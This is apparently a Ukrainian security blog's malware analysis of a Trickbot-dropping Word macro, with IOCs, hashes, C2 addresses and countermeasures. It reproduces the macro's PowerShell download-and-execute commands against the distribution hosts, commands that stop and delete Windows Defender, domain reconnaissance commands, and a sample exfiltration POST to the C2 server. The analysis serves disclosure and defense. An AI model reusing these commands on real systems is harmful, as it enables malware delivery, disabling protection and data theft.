IOC_Trickbot_040718

Доброго ранку, панове.

 

Вчора отримали на аналіз зразок документу з макросом, активація якого призводить до інфікування #Trickbot.

Обидва джерела досі активні, а основне тіло активно передає інформацію з інфікованих систем.

Є відмінності в способі доставки порівняно із зразком який ми розглядали 11/06.

Рівень загрози, для організацій котрі не блокують макроси, не контролюють PowerShell – високий.

А для тих, хто уважно читає наші поради – низький.

Нагадую, що #Trickbot є модульним ШПЗ, яке використовується для збору даних та стеження.

Може довантажувати різні модулі для шифрування або віддаленого керування.

На що треба звернути увагу:

  • Обидва сервери, що розповсюджують частини malware досі активні
  • Сервер контролю той же самий що і 11/06
  • Передача зібраних даних із User Agent ‘Test’
  • Завантаження payload силами powershell через його виклик з cmd
  • Шлях та ім’я з яким записується і запускається payload рандомні
  • Payload не кодований (!This program cannot be run in DOS mode.)
  • Payload завантажуєтеся по захищеному протоколу (Cloudflare)
  • Виконання проходить із затримкою ~2-3 хв
  • Зразок не зачищає за собою файли у %tmp% після міграції в %apdata%
  • Спроб закріплення не проводив
  • Натомість намагається відключити Windows Defender
  • Перевірку IP та звернення до Windows Update здійснює основне тіло
  • Зразок також довантажує з windowsupdate.com кореневі сертифікати
  • А от передача зібраних даних уже через інжектований svchost
  • Прав Адміністратора не потребує

І так, проблеми будуть у тих, хто:

  • Не блокують макроси (90% державних установ)
  • Не заборонили завантаження через powershell (більше 50% організацій)
  • На блокують несанкціоноване завантаження додатків з робочих систем (50% організацій)
  • Не блокують створення та запуск нових .exe з каталогів C:\Users\**\*.exe (70% установ)

Схема атаки:

Email attach (.doc) > vba macro > cmd > powershell > 2 URL > GET bri.ri > %tmp%\%random%.exe

Маркери IOC:

документ

SHA-256    fe0f98f1f0f64564150aa919ed1eed350ec6bec96eba7e08a605124afa6fe6aa
File name   in.doc
File size      80.5 KB

 

Макрос містить 2 URL:

h11p:\meanmuscles{.} com/bri.ri  + active
h11p:\icoindna{.} io/bri.ri      + active

 

основна частина

SHA-256        481fda910780812056f5dbe6a5f534ad114b527f0386933febca56b738300b54
File name   bri.ri  >> %tmp%\%random%.exe !This program cannot be run in DOS mode.
File size      316 KB

 

Відкриває з’єднання із С2

h11p\188.124.167.132:8082 POST /ser0704/hostname.UID     HTTP/1.1    test (UA)

минулого разу:
h11p\188.124.167.132:8082 POST /ser0611/hostname.UID     HTTP/1.1    test (UA)

 

Активність по процесам:

“C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE” /n /dde

C:\Windows\SysWOW64\cmd.exe /c powershell “‘powershell “”function dodjq([string] $aoumq){(new-object system.net.webclient).downloadfile($aoumq,”%tmp%\uauuind.exe”);start-process ”%tmp%\uauuind.exe”;}try{dodjq(”h11p:\icoindna {.}io/bri.ri’‘)}catch{dodjq(”h11p:\meanmuscles {.}com/bri.ri”)}'”” | out-file -encoding ascii -filepath %tmp%\wswjdpihx.bat; start-process ‘%tmp%\wswjdpihx.bat’ -windowstyle hidden”

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell  “‘powershell “”function dodjq([string] $aoumq){(new-object system.net.webclient).downloadfile($aoumq,”C:\tmp\uauuind.exe”);start-process ”C:\tmp\uauuind.exe”;}try{dodjq(”h11p:\icoindna {.}io/bri.ri”)}catch{dodjq(”h11p:\meanmuscles {.}com/bri.ri”)}'”” | out-file -encoding ascii -filepath C:\tmp\wswjdpihx.bat; start-process ‘C:\tmp\wswjdpihx.bat’ -windowstyle hidden”

C:\Windows\SysWOW64\cmd.exe  /c “”C:\tmp\wswjdpihx.bat” “

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell  “function dodjq([string] $aoumq){(new-object system.net.webclient).downloadfile($aoumq,’C:\tmp\uauuind.exe’);start-process ‘C:\tmp\uauuind.exe’;}try{dodjq(‘h11p:\icoindna {.}io/bri.ri’)}catch{dodjq(‘h11p:\meanmuscles {.}com/bri.ri’)}

“C:\tmp\uauuind.exe”

C:\Windows\SysWOW64\cmd.exe /c sc stop WinDefend

C:\Windows\SysWOW64\cmd.exe /c sc delete WinDefend

C:\Windows\SysWOW64\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Users\operator\AppData\Roaming\msscsc\uauuind.exe

C:\Windows\system32\svchost.exe

 

Зверніть увагу на рандом макросу:

1st run

——-

cmd /c powershell “‘powershell “”function ysga([string] $bmecmdmov){(new-object system.net.webclient).downloadfile($bmecmdmov,”%tmp%\xpvsvgw.exe”);start-process ”%tmp%\xpvsvgw.exe”;}try{ysga(”h11p:\icoindna{.} io/bri.ri”)}catch{ysga(”h11p:\meanmuscles{.} com/bri.ri”)}'”” | out-file -encoding ascii -filepath %tmp%\dduuyd.bat; start-process ‘%tmp%\dduuyd.bat’ -windowstyle hidden”

 

2nd run

——-

cmd /c powershell “‘powershell “”function bxode([string] $wxhfe){(new-object system.net.webclient).downloadfile($wxhfe,”%tmp%\nsxr.exe”);start-process ”%tmp%\nsxr.exe”;}try{bxode(”h11p:\icoindna{.} io/bri.ri”)}catch{bxode(”h11p:\meanmuscles{.} com/bri.ri”)}'”” | out-file -encoding ascii -filepath %tmp%\ktph.bat; start-process ‘%tmp%\ktph.bat’ -windowstyle hidden”

 

3rd run

——-

cmd /c powershell “‘powershell “”function nnpsd([string] $knhvd){(new-object system.net.webclient).downloadfile($knhvd,”%tmp%\bixi.exe”);start-process ”%tmp%\bixi.exe”;}try{nnpsd(”h11p:\icoindna{.} io/bri.ri”)}catch{nnpsd(”h11p:\meanmuscles{.} com/bri.ri”)}'”” | out-file -encoding ascii -filepath %tmp%\wjqw.bat; start-process ‘%tmp%\wjqw.bat’ -windowstyle hidden”

 

Збір інформації вбудованими засобами ОС:

C:\Windows\system32\cmd.exe /c ipconfig /all

C:\Windows\system32\cmd.exe /c net config workstation

C:\Windows\system32\cmd.exe /c net view /all

C:\Windows\system32\cmd.exe /c net view /all /domain

C:\Windows\system32\cmd.exe /c nltest /domain_trusts

C:\Windows\system32\cmd.exe /c nltest /domain_trusts /all_trusts

 

Мережеві IOC:

Завантаження основного тіла:

104.27.25.56      icoindna {.}io               GET /bri.ri HTTP/1.1     noUA
68.65.120.85      meanmuscles{.} c0m           GET /bri.ri HTTP/1.1     noUA

Минулого разу:
68.65.120.85      onetimewonders{.} c0m       GET /no.bin HTTP/1.1   noUA

 

Перевірка Public IP:

34.224.244.1      checkip.amazonaws {.}com  GET / HTTP/1.1   Mozilla/5.0

 

Передача інформації про інфіковану систему:

188.124.167.132:8082         POST /ser0704/hostname_UID HTTP/1.1 test

 

Трафік інфікованої системи:

[System Process] 49167        83.220.168.209   447   TIME_WAIT                                                                       
svchost.exe        49165        109.234.34.106   443   ESTABLISHED                                                                            
svchost.exe        49170        188.124.167.132 8082 CLOSE_WAIT                                                                             
svchost.exe        49171        109.234.34.106   443   ESTABLISHED                                                                            
svchost.exe        49172        62.140.236.163   80     ESTABLISHED

 

Яку інформацію отримують нападники:

 

POST /ser0704/hostname_UID HTTP/1.1
Content-Type: multipart/form-data; boundary=Arasfjasu7
User-Agent: test
Host: 188.124.167.132:8082
Content-Length: 5007
Cache-Control: no-cache

--Arasfjasu7

Content-Disposition: form-data; name="proclist"

                ***PROCESS LIST***

[System Process]
System
smss.exe
csrss.exe
wininit.exe
csrss.exe
winlogon.exe
services.exe
lsass.exe
lsm.exe
svchost.exe
...

--Arasfjasu7
Content-Disposition: form-data; name="sysinfo"

                ***SYSTEMINFO***

Host Name - APM11
OS Name - Microsoft Windows 7 ..........................
OS Version - Service Pack 1
OS Architecture - 64-bit
Product Type - Workstation
Build Type - Multiprocessor Free
Registered Owner - operator
Total Physical Memory - 2371 Mb
Available Physical Memory - 2371 Mb

                /c ipconfig /all

                /c net view /all

                /c net view /all /domain

                /c nltest /domain_trusts

                /c nltest /domain_trusts /all_trusts

--Arasfjasu7--
HTTP/1.1 200 OK
server: Cowboy
date: Wed, 04 Jul 2018 18:34:28 GMT
content-length: 3
Content-Type: text/plain
- - - - - - - - - - - - - - - - - - - 

Контрзаходи:

  • Перевірка журналів мережевого обладнання на наявність з’єднань із С2
  • Блокування на Proxy вихідних з’єднань без User Agent та з UA ‘test’
  • Блокування несанкціонованої доставки запускних на рівні Web та Email шлюзів
  • По можливості – відмова від макросів
  • Заборона запуску дочірніх процесів для додатків MS Office, mshta.exe, powershell та cmd – користувацьке правило Access Protection (McAfee ENS)
  • Заборона специфічного виклику PowerShell – нагадую про вбудовані можливості McAfee ENS – правила Access Protection
  • Заборона мережевої активності для PowerShell – правило вбудованого брандмауеру (по аналогії з варіант1)
  • Моніторинг (хоча б) та\або блокування створення (або хоча би запуску) нових *.EXE файлів у каталогах C:\Users\**\
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

Tags: , , , , ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: